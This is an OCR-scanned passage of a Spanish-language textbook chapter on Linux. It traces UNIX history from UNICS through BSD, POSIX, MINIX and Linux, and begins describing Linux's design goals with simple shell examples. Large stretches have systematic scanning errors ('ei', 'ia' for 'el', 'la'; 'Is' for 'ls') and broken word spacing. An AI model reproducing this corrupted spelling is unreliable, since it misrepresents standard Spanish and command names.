SCO UNIX, System V, Solaris y otras. Por fortuna, los principios fundamentales y las llamadas al 
sistema son casi iguales en todas las variantes (por diseño). Además, las estrategias de implementa¬ 
ción general, los algoritmos y las estructuras de datos son similares, aunque hay ciertas diferencias. 
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Para que los ejemplos sean concretos, es mejor elegir una de estas variantes y describirla de mane¬ 
ra consistente. Como es más probable que la mayoría de los lectores se hayan topado con Linux que 
con cualquier otra de las variantes, lo utilizaremos como nuestro ejemplo funcional, teniendo en 
cuenta que, con la excepción de la información sobre la implementación, gran parte de este capítu¬ 
lo se aplica a todos los sistemas UNIX. Hay muchos libros ya escritos sobre el uso de UNIX, pero 
también hay algunos sóbrelas características avanzadas y los aspectos internos del sistema (Bovety 
Cesati, 2005; Maxwell, 2001; McKusick y Neville-Neil, 2004; Pate, 2003; Stevens y Pago, 2008; 
Vahalia, 2007). 


10.1 HISTORIA DE UNIX Y LINUX 

UNIX y Linux tienen una historia larga e interesante, por lo que iniciaremos ahí nuestro estudio. Lo 
que empezó como el proyecto favorito de un joven investigador (Ken Thompson) se ha convertido 
en una industria de miles de millones de dólares en la que se involucran universidades, empresas 
multinacionales, gobiernos y órganos de estandarización internacionales. En las siguientes páginas 
le indicaremos cómo se ha desarrollado esta historia. 

10.1.1 U NIC S 

En las décadas de 1940 y 1950 todas las computadoras eran personales, por lo menos en el sentido 
de que la forma normal (en ese entonces) de utilizar una computadora era iniciar sesión durante una 
hora y ocupar toda la máquina durante ese periodo. Desde luego que estas máquinas eran inmensas 
en su aspecto físico, pero sólo una persona (el programador) podía utilizarlas en un momento dado. 
Cuando llegaron los sistemas de procesamiento por lotes en la década de 1960, el programador en¬ 
viaba un trabajo en tarjetas perforadasy lo llevaba al cuarto de la máquina. Cuando se habían ensam¬ 
blado suficientes trabajos, el operador los leía como un solo lote. Por lo general se requería una hora 
o más después de enviar un trabajo para que se devolviera el resultado. Bajo estas circunstancias, 
la depuración era un proceso que consumía mucho tiempo, ya que una sola coma mal ubicada po¬ 
día ocasionar que el programador desperdiciara varias horas de su tiempo. 

Para solucionar lo que todos consideraban un arreglo insatisfactorio e improductivo, se inven¬ 
tó el tiempo compartido en el Dartmouth Collegey el M .I.T. El sistema de Darmouth ejecutaba só- 
loBASIC y disfrutó de un éxito comercial de corto plazo antes de desaparecer. El sistema deM .I.T., 
llamado CTSS, era de propósito general y tuvo un enorme éxito en la comunidad científica. Poco 
tiempo después, los investigadores en el M .I.T. unieron fuerzas con Bell Labs y General Electric 
(que entonces era distribuidor de computadoras) y empezaron a diseñar un sistema de segunda ge¬ 
neración, conocido como MULTICS (Multiplexed Information and Computing Service, Servicio 
multiplexado de información y cómputo), como vimos en el capítulo 1. 

Aunque Bell Labs era uno de los socios fundadores en el proyecto M ULTICS, tiempo después 
se retiró y uno de sus investigadores, de nombre Ken Thompson, buscaba algo interesante en lo que 
pudiera trabajar. En cierto momento decidió escribir una versión simplificada de MULTICS por su 
cuenta (esta vez en ensamblador), en una minicomputadora PDP-7 desechada. A pesar del pequeño ta¬ 
maño de la PDP-7, el sistema de Thompson funcionaba y podía soportar su esfuerzo de desarrollo. 
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En consecuencia, uno de los otros investigadores en Bell Labs llamado Brian Kernighan, en son de 
broma le llamó UNICS (U niplexed Information and Computing Service, Servicio uniplexado de in¬ 
formación y cómputo) que en inglés se pronuncia igual que "eunuco". A pesar délos albures de que 
"EUNUCHS" era un M ULTICS castrado el nombre se quedó, aunque la ortografía se cambió más 
adelante a UNIX. 


10.1.2 UNIX EN LA PDP-11 

El trabajo deThompson impresionó tanto a muchos de sus colegas de Bell Labs, que pronto se le 
unió Dennis Ritchie, y más tarde todo su departamento. En esta época ocurrieron dos desarrollos 
importantes. En primer lugar, UNIX se trasladó de la obsoleta PDP-7 a la PDP-11/20 que era mu¬ 
cho más moderna, y más adelante a la PDP-11/45 y a la PDP-11/70. Estas últimas dos máquinas do¬ 
minaron el mundo de las minicomputadoras durante casi toda la década de 1970. La PDP-11/45 y 
la PDP-11/70 eran potentes máquinas con memorias físicas grandes para su época (256 KB y 2 M B, 
respectivamente). Además tenían hardware de protección de memoria, con lo cual era posible dar 
soporte a varios usuarios al mismo tiempo. Sin embargo, ambas eran máquinas de 16 bits que limi¬ 
taban los procesos individuales a 64 KB de espacio para las instrucciones y 64 KB de espacio para 
los datos, aunque la máquina pudo haber tenido mucha más memoria física. 

El segundo desarrollo estaba relacionado con el lenguaje en el que se escribió UNIX. Para en¬ 
tonces se estaba llegando a la dolorosa conclusión de que no era divertido tener que reescribir el sis¬ 
tema completo para cada nueva máquina, por lo que Thompson decidió reescribir UNIX en un 
lenguaje de alto nivel de su propio diseño, llamado B. B era una forma simplificada deBCPL (que 
a su vez era una forma simplificada de CPL, y al igual que PL/I, nunca funcionó). Debido a las de¬ 
bilidades en B, en especial la falta de estructuras, este intento no tuvo éxito. Después, Ritchie dise¬ 
ñó un sucesor para B al que llamó (naturalmente) C, y escribió un excelente compilador para este 
lenguaje. Thompson y Ritchie trabajaron en conjunto para reescribir UNIX en C. Éste fue el len¬ 
guaje adecuado en el momento apropiado, y desde entonces ha dominado la programación de sis¬ 
temas. 

En 1974, Ritchie y Thompson publicaron un famoso artículo sobre UNIX (Ritchie y Thomp¬ 
son, 1974). Por el trabajo que describieron en este artículo, recibieron más tarde el prestigioso 
Premio Turing de la ACM (Ritchie, 1984; Thompson, 1984). La publicación de este artículo es¬ 
timuló a muchas universidades para que pidieran a Bell Labs una copia de UNIX. ComoAT&T, 
la empresa matriz de Bell Labs, era un monopolio en ese entonces y no podía estar en el negocio 
de las computadoras, no tuvo objeción para licenciar UNIX a las universidades por una modesta 
cuota. 

En una de esas coincidencias que a menudo dan forma a la historia, la PDP-11 era la compu¬ 
tadora preferida en casi todos los departamentos de ciencias computacionales en las universidades, 
y tanto los profesores como los estudiantes consideraban pésimos los sistemas operativos que in¬ 
cluía esta minicomputadora. UNIX llenó el vacío con rapidez, sobretodo porque incluía el códi¬ 
go fuente completo, para que las personas pudieran juguetear con él sin parar. Se organizaron 
numerosas reuniones científicas sobre UNIX, donde oradores distinguidos hablaban sobre algún 
error oscuro en el kernel que habían descubierto y corregido. Un profesor australiano de nombre 


722 


CASO DE ESTUDIO 1: LINUX 


CAPITULO 10 


John Lions escribió un comentario sobre ei código fuente de UNIX, dei tipo que por io generai se 
reserva para ias obras de Chaucer o Shakespeare (se reimprimió como Lions, 1996). Ei iibro des¬ 
cribió ia versión 6, cuyo nombre se debe a que se describió en ia sexta edición dei M anuai dei pro¬ 
gramador de UNIX. El código fuente constaba de 8200 líneas de C y 900 líneas de código 
ensamblador. Como resultado de toda esta actividad, las nuevas ideas y mejoras al sistema se es¬ 
parcieron con rapidez. 

Después de unos años, la versión 6 se reemplazó por la versión 7, la primera versión portátil 
de UNIX (se ejecutaba en la PDP-11 y en la Interdata 8/32), que entonces contenía 18,800 líneas de 
C y 2100 líneas de ensamblador. Toda una generación de estudiantes creció con la versión 7; ellos 
contribuyeron a su esparcimiento cuando se graduaron y entraron a trabajar en la industria. A me¬ 
diados de la década de 1980, UNIX se utilizaba ampliamente en minicomputadoras y estaciones 
de trabajo de ingeniería de una variedad de distribuidores. Incluso varias empresas obtuvieron 
una licencia para el código fuente y crearon su propia versión de UNIX. Entre ellas estaba 
M icrosoft, que en ese entonces era una pequeña empresa que empezaba a operar y vendió la ver¬ 
sión 7 bajo el nombreX ENIX durante varios años, hasta que perdió el interésen este sistema ope¬ 
rativo. 


10.1.3 UNIX portable 

Ahora que UNIX estaba escrito en C, era mucho más sencillo moverlo (portarlo) a una nueva má¬ 
quina. Para portar un sistema operativo primero hay que escribir un compilador en C para la nueva 
máquina. Después hay que escribir drivers para los nuevos dispositivos de E/S de la máquina, co¬ 
mo monitores, impresoras y discos. Aunque el código de los drivers está en C, no es posible mo¬ 
verlo a otra máquina, compilarlo y ejecutarlo debido a que no hay dos discos que funcionen de la 
misma manera. Por último se debe reescribir una pequeña cantidad de código dependiente de la má¬ 
quina, como los manejadoras de interrupciones y las rutinas de administración de memoria, que por 
lo general están en lenguaje ensamblador. 

La primera máquina en la que se portó UNIX después de la PDP-11 fue la minicomputadora 
Interdata 8/32. Este ejercicio reveló muchas suposiciones que UNIX hacía de manera implícita so¬ 
bre la máquina en la que se ejecutaba, como la suposición tácita de que los enteros contenían 16 
bits, los apuntadores también contenían 16 bits (lo cual implicaba un tamaño máximo de 64 KB pa¬ 
ra los programas) y que la máquina tenía sólo tres registros disponibles para contener variables im¬ 
portantes. Nada de esto era cierto en la Interdata, por lo que se requería un trabajo considerable para 
limpiarUNIX. 

Otro de los problemas era que, aunque el compilador de Ritchie era rápido y producía buen có¬ 
digo objeto, sólo producía código objeto para la PDP-11. En vez de escribir un nuevo compilador 
específico para la Interdata, Stevejohnson de Bell Labs diseñó e implementó el compilador deC 
portable, que se podía redirigir para producir código en cualquier máquina razonable, con sólo un 
pequeño esfuerzo. Durante años, casi todos los compiladores de C para las máquinas distintas de la 
PDP-11 se basaron en el compilador de Johnson, lo cual ayudó en forma considerable a que UNIX 
se esparciera a las nuevas computadoras. 
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Al principio el UNIX que se portó en la Interdata se ejecutaba con lentitud, debido a que todo 
el trabajo de desarrollo se tenía que realizar en la única máquina que funcionaba con UNIX, una 
PDP-11 que se encontraba en el quinto piso de Bell Labs. La Interdata estaba en el primer piso. Pa¬ 
ra generar una nueva versión, había que compilarla en el quinto piso y después llevar físicamente 
una cinta magnética al primer piso para ver si funcionaba. Después de varios meses de transportar 
cintas magnéticas, un desconocido dijo: "¿Sabes? somos la compañía telefónica. ¿Acaso no pode¬ 
mos conectar un cable entre estas dos máquinas?". Así fue como nació UNIX en red. Después de 
portarlo a la Interdata, se portó a la VAX ya otras computadoras. 

Cuando el gobierno estadounidense dividió AT&T en 1984, la empresa era legalmente libre 
de establecer una subsidiaria de computadoras, y lo hizo casi de inmediato. Poco después, AT&T 
publicó su primer producto UNIX comercial, conocido como System III. No fue muy bien recibi¬ 
do, por lo que un año después se reemplazó con una versión mejorada, System V. U no de los gran¬ 
des misterios sin resolver en las ciencias computacionales es el paradero de System IV. Desde 
entonces, la versión System V original se ha reemplazado por System V, versiones 2, 3 y 4, cada 
una de las cuales es más grande y complicada que su antecesora. En el proceso, la idea original 
detrás de U NIX en cuanto a tener un sistema simple y elegante se ha ido evaporando en forma gra¬ 
dual. Aunque el grupo de Ritchie y Thompson produjo más tarde una 8® 9-y 10-edición de U NIX, 
éstas nunca se pusieron en circulación, ya queAT&T puso todo su esfuerzo de marketing en la ver¬ 
sión System V. Sin embargo, se fueron incorporando algunas de las ideas de las ediciones 8, 9 y 
10 a la versión System V. En cierto momento, AT&T decidió que quería ser una compañía telefó¬ 
nica y no una empresa de computadoras después de todo, y vendió su negocio de UNIX a Novell 
en 1993. Después Novell lo vendió a Santa Cruz Operation en 1995. Para entonces era casi irrele¬ 
vante saber quién era el propietario, ya que todas las principales empresas de computadoras tenían 
licencias. 


10.1.4 Berkeley UNIX 

La Universidad de California en Berkeley fue una de las primeras universidades que adquirieron la 
versión 6 de UNIX. Como estaba disponible el código fuente completo, Berkeley pudo realizar mo¬ 
dificaciones importantes al sistema. Con la ayuda de concesiones de laARPA (Agencia de Proyec¬ 
tos de Investigación Avanzados del Departamento de Defensa de los EE.UU.), Berkeley produjo y 
liberó una versión mejorada para la PDP-11, conocida como IBSD (First Berkeley Software 
Distribution, Primera distribución de software de Berkeley). M uy poco después se produjo otra ver¬ 
sión, llamada 2BSD, también para la PDP-11. 

Las versiones más importantes fueron 3BSD y en especial su sucesora, 4BSD para la VAX. 
AunqueATSíT tenía una versión de UNIX para la VAX, conocida como 32V, en esencia era la ver¬ 
sión 7. Por el contrario, 4BSD contenía una gran cantidad de mejoras. Algunas de las más impor¬ 
tantes eran el uso de la memoria virtual y paginación, con lo cual los programas podían ser más 
grandes que la memoria física al paginar partes de ellos según fuera necesario. Otra de las modifi¬ 
caciones fue permitir que los nombres de archivos tuvieran más de 14 caracteres. También se mo¬ 
dificó la implementación del sistema de archivos para hacerlo mucho más rápido. El manejo de 
señales se hizo más confiable. Se introdujo el concepto de las redes, y el protocolo de red que se 
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utilizó (TCP/IP) se convirtió en el estándar por omisión en el mundo de UNIX, y posteriormente 
en Internet, que está dominada por los servidores basados en UNIX. 

Berkeley también agregó una cantidad considerable de programas utilitarios a UN IX, incluyen¬ 
do un nuevo editor (vi), un nuevo shell (csh), compiladores de Pascal y Lisp, y muchos más. Todas 
estas mejoras hicieron que Sun M icrosystems, DEC y otros distribuidores de computadoras basa¬ 
ran sus versiones de UN IX en el Berkeley UNIX, en vez de hacerlo en la versión "oficial" deAT&T, 
System V. Como consecuencia, Berkeley UNIX se estableció firmemente en las áreas académicas, 
de investigación y de defensa. Para obtener más información sobre Berkeley UNIX, consulte 
M cKusick y colaboradores (1996). 


10.1.5 UNIX estándar 

A finales de la década de 1980 había dos versiones muy populares, distintas y en cierta forma in¬ 
compatibles de UNIX: 4.3BSD y System V Pelease 3. Además, casi todos los distribuidores 
de computadoras agregaban sus propias mejoras que no eran estándar. Esta división en el mundo de 
UNIX, aunada al hecho deque no había estándares para los formatos de los programas binarios, in¬ 
hibió en gran parte el éxito comercial de UNIX debido a que era imposible para los distribuidores 
de software escribir y empaquetar programas de UNIX con la expectativa de que se ejecutarían en 
cualquier sistema UN IX (como se hacía de manera rutinaria con M S-DOS). En un principio, varios 
intentos de estandarizar UNIX fracasaron. Por ejemplo, AT&T emitió la SVID (System V Interfa- 
ce Definition, Definición de la interfaz de System V), que definía todas las llamadas al sistema, 
los formatos de los archivos, etcétera. Este documento era un intento por mantener alineados a to¬ 
dos los distribuidores de System V, pero no tuvo efecto en el campo enemigo (BSD), ya que sólo 
lo ignoraron. 

El primer intento serio por reconciliar las dos versiones de UNIX se inició bajo los auspicios 
del Consejo de Estándares del IEEE, un órgano muy respetado y, lo más importante, neutral. Cien¬ 
tos de personas de la industria, universidades y del gobierno participaron en este trabajo. El nom¬ 
bre colectivo que se asignó a este proyecto fue POSIX. Las primeras tres letras significan Sistema 
operativo portable. Las letras IX se agregaron para que el nombre tuviera el estilo de UNIX. 

Después de muchos argumentos y contraargumentos, refutaciones y contrarrefutaciones, el co¬ 
mité de POSIX produjo un estándar conocido como 1003 . 1 . Este estándar define un conjunto de 
procedí mi entos de bi bl i oteca que todo si stema UNIX que esté en conf ormi dad debe proveer. L a ma¬ 
yoría de estos procedimientos invocan una llamada al sistema, pero unos cuantos se pueden imple- 
mentar fuera del kernel. Los procedimientos comunes son open, read y fork. La idea de POSIX es 
que un distribuidor de software, que escriba un programa utilice sólo los procedimientos definidos 
por el estándar 1003.1, tenga la seguridad de que este programa se ejecutará en todos los sistemas 
UNIX que estén en conformidad. 

A unque es cierto que la mayoría de las organizaciones de estándares tienen la tendencia de pro¬ 
ducir una horrible solución intermedia con unas cuantas características favoritas de todos, el están¬ 
dar 1003.1 es bastante bueno si se tiene en cuenta la gran cantidad de partes involucradas y sus 
respectivos intereses personales. En vez de tomar la unión de todas las características en System V 
y BSD como el punto inicial (la norma para la mayoría de las organizaciones de estándares), el co- 
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mitédel IEEE se fue por la intersección. La metodoiogía era muy cruda: si había una característica 
presente en System V y BSD, se inciuía en ei estándar; en caso contrario no se inciuía. Como con¬ 
secuencia de este aigoritmo, ei estándar 1003.1 se asemeja mucho ai ancestro directo tanto de Sys¬ 
tem V como de BSD, a saber ia versión 7. Ei documento dei estándar 1003.1 está escrito de tai 
forma que tanto ios impiementadores de sistemas operativos como ios escritores de software pue¬ 
dan comprenderio, otra novedad en ei mundo de ios estándares, aunque ya están trabajando para re¬ 
mediar esto. 

Aunqueei estándar 1003.1 trata sóio ias iiamadas ai sistema, hay documentos reiacionadosque 
estandarizan ios hiios, ios programas utiiitarios, ei trabajo en red y muchas otras características de 
UNIX. Además, ANSI e ISO también han estandarizado ei ienguaje C. 


10.1.6 MINIX 

Una propiedad que tienen todos ios sistemas UNIX modernos es que son grandes y complicados: 
en cierto sentido, son la antítesis de la idea original detrás de UNIX. Aun si el código fuente estu¬ 
viera disponible para todos (lo cual no es verdad en la mayoría de los casos), es impensable que una 
sola persona pueda comprenderlo ahora. Esta situación orilló al autor de este libro a escribir un nue¬ 
vo sistema parecido a UNIX, que era lo bastante pequeño como para comprenderlo, estaba dispo¬ 
nible con todo el código fuente y se podía utilizar para fines educativos. Ese sistema consistía en 
11,800 líneas de C y 800 líneas de código ensamblador. Se liberó en 1987 y era casi equivalente 
en función a la versión 7 de UNIX, el pilar principal de la mayoría de los departamentos de cien¬ 
cias computacionales durante la era de la PDP-11. 

MINIX fue uno de los primeros sistemas parecidos a UNIX que se basaban en el diseño de un 
microkernel. La idea detrás de un microkernel es proveer una funcionalidad mínima en el kernel pa¬ 
ra que sea confiable y eficiente. En consecuencia, la administración de la memoria y el sistema de 
archivos se dejaron fuera como procesos de usuario. El kernel se encargaba del paso de mensajes 
entre los procesos y unas cuantas cosas más. El kernel tenía 1600 líneas de C y 800 líneas de en¬ 
samblador. Por cuestiones técnicas relacionadas con la arquitectura del procesador 8088, los drivers 
de los dispositivos de E/S (2900 líneas adicionales de C) también estaban en el kernel. El sistema de 
archivos (5100 líneas de C) y el administrador de memoria (2200 líneas de C) se ejecutaban como 
dos procesos de usuario separados. 

Los microkerneis tienen ventaja sobre los sistemas monolíticos en cuanto a que son fáciles de 
comprender y mantener debido a su estructura sumamente modular. Además, el proceso de pasar 
el código del modo de kernel al modo de usuario los hace muy confiables, debido a que cuando fa¬ 
lla un proceso en modo de usuario se producen menos daños que cuando falla un componente en mo¬ 
do de kernel. Su principal desventaja es que el rendimiento disminuye un poco debido a los cambios 
adicionales entre el modo de kernel y el modo de usuario. Sin embargo, el rendimiento no lo es to¬ 
do: todos los sistemas UNIX modernos ejecutan X Windows en modo de usuario y simplemente 
aceptan la reducción en el rendimiento para obtener una mayor modularidad (al contrario de Win¬ 
dows, donde toda la GUI (Graphical User Interface, Interfaz Gráfica de Usuario) está en el kernel). 
Otros de los diseños de microkerneis conocidos en esta época eran los de Mach (Accetta y colabo¬ 
radores, 1986) y Chorus (Roziery colaboradores, 1998). 
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Unos cuantos meses después de su aparición, M INIX se convirtió un poco en un artícuio de 
cuito, con su propio grupo de noticias de USENET (ahora en Googie), comp.os.minix, y más 
de 40,000 usuarios. M uchos usuarios contribuyeron comandos y otros programas de usuario, por io 
que M INIX se convirtió en un compromiso coiectivo en ei que estaban invoiucrados muchísimos 
usuarios a través de Internet. Era un prototipo de otros esfuerzos coiaborativos que iiegaron des¬ 
pués. En 1997 se iiberó ia versión 2.0 de M INIX, y ei sistema base (que ahora inciuyeei trabajo en 
red) creció hasta 62,200 iíneas de código. 

Para ei 2004 ia dirección dei desarroiio de M INIX había cambiado de manera radicai; enton¬ 
ces ei énfasis estaba en ia construcción de un sistema en extremo confiabie y seguro, que pudie¬ 
ra reparar de manera automática sus propias faiias y siguiera funcionando de manera correcta, 
aun frente a ia activación repetida de errores en ei software. Como consecuencia, ia idea de ia 
moduiarización que se presentó en ia versión 1 se expandió de manera considerabie en MINIX 
3.0, donde casi todos ios drivers de dispositivos se movieron ai espacio de usuario y cada driver 
se ejecutaba como un proceso separado. Ei tamaño dei kernei compieto se redujo de manera drás¬ 
tica a menos de 4000 iíneas de código, aigo que un soio programador podía comprender con fa- 
ciiidad. Los mecanismos internos se modificaron para mejorar ia toierancia a errores en muchas 
formas. 

Además, se portaron más de 500 programas popuiares de UNIX aMINIX 3.0, incluyendo el 
Sistema X Window (al que algunas veces sólo se le llama X), varios compiladores (incluyendo 
gcc), software de procesamiento de texto, software de red, navegadores Web y muchos más. A di¬ 
ferencia de las versiones anteriores, que en gran parte tenían una naturaleza educativa, desde MI- 
NIX 3.0 el sistema se podía utilizar en muchos aspectos, y el enfoque estaba orientado a una alta 
confiabilidad. El objetivo máximo es: no más botones de reinicio. 

Posteriormente apareció una tercera edición del libro donde se describía detalladamente el nue¬ 
vo sistema y su código fuente, que se proporcionaba en un apéndice (Tanenbaum y Woodhull, 
2006). El sistema continúa su evolución y tiene una comunidad activa de usuarios. Para obtener más 
detalles y la versión actual sin costo, puede visitar el sitio www.minix3.org. 


10.1.7 Linux 

Durante los primeros años del desarrollo de M INIX y su discusión en Internet, muchas personas so¬ 
licitaron (o en muchos casos, exigieron) más y mejores características, a lo cual el autor con fre¬ 
cuencia decía que "No" (para mantener el sistema lo bastante pequeño como para que los 
estudiantes lo comprendieran en su totalidad, en un curso universitario de un semestre). Este conti¬ 
nuo "No" fastidió a muchos usuarios. En esta época el sistema FreeBSD no estaba disponible, por 
lo que no era una opción. Después de varios años de estar así, un estudiante finlandés llamado 
LinusTorvalds decidió escribir otro clon de UNIX conocido como Linux, el cual podría ser un sis¬ 
tema de producción completo con muchas características que no tenía M INIX al principio. La pri¬ 
mera versión de Linux (0.01) se liberó en 1991. Tuvo un desarrollo cruzado en una máquina con 
M INIX y tomó prestadas numerosas ideas de este sistema, desde la estructura del árbol de código 
fuente hasta la distribución del sistema de archivos. Sin embargo, su diseño era monolítico en vez 
de microkernel, y todo el sistema operativo residía en el kernei. El total de código era de 9300 lí- 
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neas en C y 950 líneas en ensamblador, aproximadamente similar a la versión de MINIX en cuan¬ 
to al tamaño, y también se le podía comparar en relación con su funcionalidad. De hecho, fue un 
rediseño de M INIX, el único sistema del queTorvalds tenía el código fuente. 

Linux aumentó su tamaño con rapidez y evolucionó para convertirse en un clon de UNIX com¬ 
pleto y de producción, a medida que se le agregaron la memoria virtual, un sistema de archivos más 
sofisticado y muchas otras características. Aunque en un principio se ejecutaba sólo en el 386 (e in¬ 
cluso tenía incrustado código ensamblador para el 386 en medio de los procedimientos de C), se 
llevó rápidamente a otras plataformas y ahora se ejecuta en una amplia variedad de máquinas, al 
igual que UNIX. Sin embargo, hay una diferencia que lo hace distinguirse de UNIX: Linux utiliza 
muchas características especiales del compilador gcc y se requeriría mucho trabajo para poder com¬ 
pilarlo con un compilador de C con el estándarANSI. 

La siguiente revisión mayor de Linux fue la versión 1.0, que se liberó en 1994. Tenía aproxima¬ 
damente 165,000 líneas de código e incluía un nuevo sistema, archivos con asignación de memoria 
y una red compatible con BSD, con sockets y TCP/IP. También incluyó muchos nuevos drivers de 
dispositivos. En los siguientes dos años se produjeron varias revisiones menores. 

Para entonces, Linux era tan compatible con UNIX que se portó una enorme cantidad de soft¬ 
ware de este sistema a Linux, con lo cual logró una utilidad mucho mayor. Además, Linux atrajo a 
una gran cantidad de personas que empezaron a trabajar en el código y lo extendieron de muchas 
maneras bajo la supervisión general deTorvaIds. 

La siguiente revisión mayor (2.0) se liberó en 1996. Consistía en aproximadamente470,000 lí¬ 
neas de C y 8000 líneas de código ensamblador. Incluía aceptación de arquitecturas de 64 bits, la 
multiprogramación simétrica, nuevos protocolos de red y muchas otras características. Una exten¬ 
sa colección de drivers de dispositivos ocupaba una gran fracción de la masa total de código. Des¬ 
pués se liberaron con frecuencia versiones adicionales. 

Los números de versión del kernel de Linux consisten en cuatro números: A.B.C.D, como 
2.6.9.11. El primer número indica la versión del kernel. El segundo número indica la revisión ma¬ 
yor. A ntes del kernel 2.6, los números de revisión pares correspondían a versiones estables del ker¬ 
nel, mientras que los impares correspondían a revisiones inestables que estaban en desarrollo. 
Después del kernel 2.6 los números se manejaron en forma distinta. El tercer número corresponde 
a las revisiones menores, como la aceptación de nuevos drivers. El cuarto número corresponde a las 
correcciones de errores menores o parches de seguridad. 

Hay una gran selección de software estándar de UNIX que se ha portado a Linux, incluyendo 
el Sistema X Window y una gran cantidad de software de red. También se han escrito dos GU Is dis¬ 
tintas (GNOM E y KDE) para Linux. En resumen, ha crecido para convertirse en un clon de UNIX 
completo, con todos los adornos que podría desear un amante de U NIX. 

Una característica inusual de Linux es su modelo de negocios: es software gratuito. Se puede 
descargar de varios sitios en Internet, por ejemplo: www.kernel.org. Linux incluye una licencia idea¬ 
da por Richard Stallman, fundador de la Fundación de software libre. A pesar del hecho de que 
Linux es libre, esta licencia conocida como GPL (GNU Public License, Licencia pública de GNU) 
es más larga que la licencia de M icrosoft Windows y especifica lo que se puede hacer y lo que no se 
puede hacer con el código. Los usuarios pueden utilizar, copiar, modificar y redistribuir el código 
fuente y binario libremente. La principal restricción esquelas obras derivadas del kernel de Linux 
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no se pueden vender o redistribuir en formato binario soiámente; se debe enviar ei código fuente con 
ei producto, o debe estar disponibie a petición dei que io desee. 

AunqueTorvaids aún controia ei kernei muy de cerca, muchos otros programadores han es¬ 
crito una gran cantidad de software a nivei de usuario, muchos de ios cuaies migraron en un prin¬ 
cipio de ias comunidades en iínea de M INIX, BSD y GNU. Sin embargo, a medida que Linux 
evoiuciona cada vez hay menos usuarios en ia comunidad de Linux que desean manipuiar ei códi¬ 
go fuente (observe ios cientos de iibros que indican cómo instaiar y utiiizar Linux, y sóio unos 
cuantos anaiizan ei código o ia manera en que funciona). Además, ahora muchos usuarios de Li¬ 
nux renuncian a ia distribución gratuita en Internet para comprar una de las muchas distribuciones 
en CD-ROM , disponibles a través de muchas empresas comerciales competidoras. Hay un popu¬ 
lar sitio Web llamado www.distrowatch.org, en el cual se listan las 100 distribuciones de Linux 
más populares. A medida que cada vez más empresas de software empiezan a vender sus propias 
versiones de Linux y cada vez más empresas de hardware ofrecen preinstalarlo en las computado¬ 
ras que venden, la línea entre el software comercial y el libre se ha empezado a borrar de manera 
considerable. 

Como anotación a pie de página en la historia de Linux, es interesante observar que justo cuan¬ 
do este sistema operativo empezaba a crecer en popularidad, recibió un gran impulso por parte de 
una fuente inesperada: AT&T. En 1992, cuando Berkeley se estaba quedando sin patrocinio, deci¬ 
dió terminar el desarrollo de BSD con una versión final: 4.4BSD (que más tarde formó la base de 
FreeBSD). Como en esencia esta versión no contenía código de AT&T, Berkeley liberó el softwa¬ 
re bajo una licencia de código fuente abierto (no GPL) que permitía a todos hacer lo que quisieran 
con él, excepto una cosa: demandar a la Universidad de California. La subsidiaria deAT&T 
que controlaba UNIX reaccionó con prontitud al (sí, adivinó) demandara la Universidad de Cali¬ 
fornia. También demandó a una empresa llamada BSDI, establecida por los desarrolladores de BSD 
para empaquetar el sistema y vender soporte, en forma muy parecida a lo que hacen Red Hat y otras 
empresas para Linux. Como casi no había código deAT&T involucrado, la demanda se basaba en 
la violación de los derechos de autor y la marca registrada, incluyendo elementos como el número 
telefónico 1-800-ITS-UNIX de BSDI. Aunque en última instancia el caso se resolvió fuera de la 
corte, mantuvo a FreeBSD fuera del mercado el tiempo suficiente como para que Linux pudiera es¬ 
tablecerse bien. En caso de que no se hubiera llevado a cabo la demanda, al principio de 1993 
se hubiera desencadenado una seria competencia entre dos sistemas UNIX gratuitos de código fuen¬ 
te abierto: el campeón reinante BSD, un sistema maduro y estable con un gran seguimiento acadé¬ 
mico que se remonta hasta 1977, contra el retador vigoroso y joven llamado Linux, con sólo dos 
años de edad pero que cada vez tenía más seguidores. ¡Quién sabe cómo hubiera terminado esta ba¬ 
talla de los UNICES libres! 


10.2 GENERALIDADES SOBRE LINUX 

En esta sección veremos una introducción general a Linux y la forma en que se utiliza, para bene¬ 
ficio délos lectores que no están familiarizados con este sistema operativo. Casi todo el material se 
aplica a la mayoría de las variantes de UNIX con sólo unas pequeñas modificaciones. Aunque 
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Linux tiene varias interfaces gráficas, ei enfoque se hace aquí en ia forma en que Linux aparece pa¬ 
ra un programador que trabaja en una ventana de sheii en X. En ias siguientes secciones nos con¬ 
centraremos en ias iiamadas ai sistema y su funcionamiento interno. 

10.2.1 Objetivos de Linux 

UNIX siempre fue un sistema interactivo diseñado para manejar varios procesos y usuarios ai mis¬ 
mo tiempo. Fuediseñado por programadores, para que ios programadores io utiiizaran en un entor¬ 
no en ei que ia mayoría de ios usuarios son reiativamente sofisticados y están invoiucrados en 
proyectos de desarroi i o de software (que con frecuencia son bastante complejos). En muchos casos, 
hay una gran cantidad de programadores que cooperan de manera activa para producir un soio sis¬ 
tema, por io que UNIX tiene muchas herramientas para permitir que ias personas trabajen en con¬ 
junto y compartan información en formas controiadas. Ei modeio de un grupo de programadores 
experimentados que trabajan en conjunto muy de cerca para producir software avanzado es, sin du¬ 
da, muy distinto ai modeio de computadora personai de un soio principiante que trabaja soio con 
un procesador de paiabras, y esta diferencia se refieja a través de UNIX, de principio a fin. Es na- 
turai que Linux haya heredado tantos de estos objetivos, aunque ia primera versión haya sido para 
una computadora personai. 

¿Qué quieren ios buenos programadores en un sistema? Para empezar, ia mayoría desean que 
sus sistemas sean simpies, eiegantes y consistentes. Por ejempio, en ei nivei más bajo, un archivo 
sóio debe ser una coiección de bytes. Ei tener distintas ciases de archivos para acceso secuenciai, 
acceso aieatorio, acceso manipuiado, acceso remoto, etcétera (como en ias mainframes) sóio estor¬ 
ba. De manera simiiar, si ei comando 

Is A* 

indica que se deben iistar todos ios archivos que empiecen con "A", entonces ei comando 
rm A* 

indica que se deben eiiminar todos ios archivos que empiecen con "A", y no que se debe eiiminar 
ei archivo cuyo nombre consiste en una "A" y un asterisco. Aigunas veces a esta característica se 
ie conoce como ei principio de ia menor sorpresa. 

Otra de ias cosas que desean ios programadores experimentados por io generai es potencia y fie- 
xibiiidad. Esto significa que un sistema debe tener un pequeño número de dementas básicos que se 
puedan combinar en una variedad deformas para adaptarse a ia apiicación. Uno de ios iineamientos 
básicos detrás de Linux es que cada programa debe hacer sóio una cosa, y debe haceria bien. Por en¬ 
de, ios compiiadores no producen iistados, debido a que otros programas io pueden hacer mejor. 

Por úitimo, ia mayoría de ios programadores tienen un gran disgusto por ia redundancia inútii. 
¿Por qué escribir copy cuando basta con cp? Para extraer todas ias iíneas que contengan ia cadena 
"ard" dei archivo f, ei programador de Linux escribe 

grep ard f 

